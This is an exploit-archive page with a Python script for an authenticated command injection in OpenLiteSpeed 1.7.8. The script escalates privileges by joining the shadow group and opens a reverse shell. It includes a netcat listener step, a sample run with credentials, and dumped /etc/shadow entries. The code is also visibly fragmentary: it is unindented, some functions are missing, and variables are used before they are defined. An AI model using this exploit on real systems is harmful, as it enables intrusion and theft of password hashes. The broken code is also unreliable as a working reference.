Exploits / Vulnerability Discovered : 2021-02-11 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Openlitespeed webserver 1.7.8 command injection (authenticated) (2) is for educational purposes only and if it is used you will do on your own risk!
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
"""
Description:
The "path" parameter has command injection vulnerability that leads to escalate privilege.
OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
Details: https://github.com/litespeedtech/openlitespeed/issues/217
Example:
Step-1:
ubuntu@ubuntu:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
Step-2:
ubuntu@ubuntu:~$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Step-3:
ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
[+] Authentication was successful!
[+] Version is detected: OpenLiteSpeed 1.7.8
[+] The target is vulnerable!
[+] tk value is obtained: 0.98296300 1612966522
[+] Sending reverse shell to 127.0.0.1:4444 ...
[+] Triggering command execution...
Step-4:
ubuntu@ubuntu:~$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 127.0.0.1 54534 received!
cat /etc/shadow
root:!:18620:0:99999:7:::
daemon:*:17937:0:99999:7:::
bin:*:17937:0:99999:7:::
sys:*:17937:0:99999:7:::
sync:*:17937:0:99999:7:::
.
.
.
"""
def triggerCommandExec(target, s):
data = {"act" : "restart"}
trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
if trigger.status_code == 200:
print("[+] Triggering command execution...")
else:
print("[-] Someting went wrong!")
if exec.status_code == 200:
if exec.text == "Illegal entry point!":
print("[-] tk value is incorrect!")
sys.exit(1)
else:
print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
else:
print("[-] Something went wrong!")
sys.exit(1)
if login.status_code == 302:
print("[+] Authentication was successful!")
elif login.status_code == 200:
print("[-] Authentication was unsuccessful!")
sys.exit(1)
else:
print("[-] Connection error!")
sys.exit(1)
version = s.get("https://" + target + "/index.php")
versionSource = BeautifulSoup(version.text, "html.parser")
v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
if v.split()[2] == "1.7.8":
print("[+] The target is vulnerable!")
#getting tk value
getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
source = BeautifulSoup(getTk.text, 'html.parser')
tk = source.find('input', {'name':'tk'}).get('value')
print("[+] tk value is obtained: "+tk)
commandExec(tk, groupId, s, target)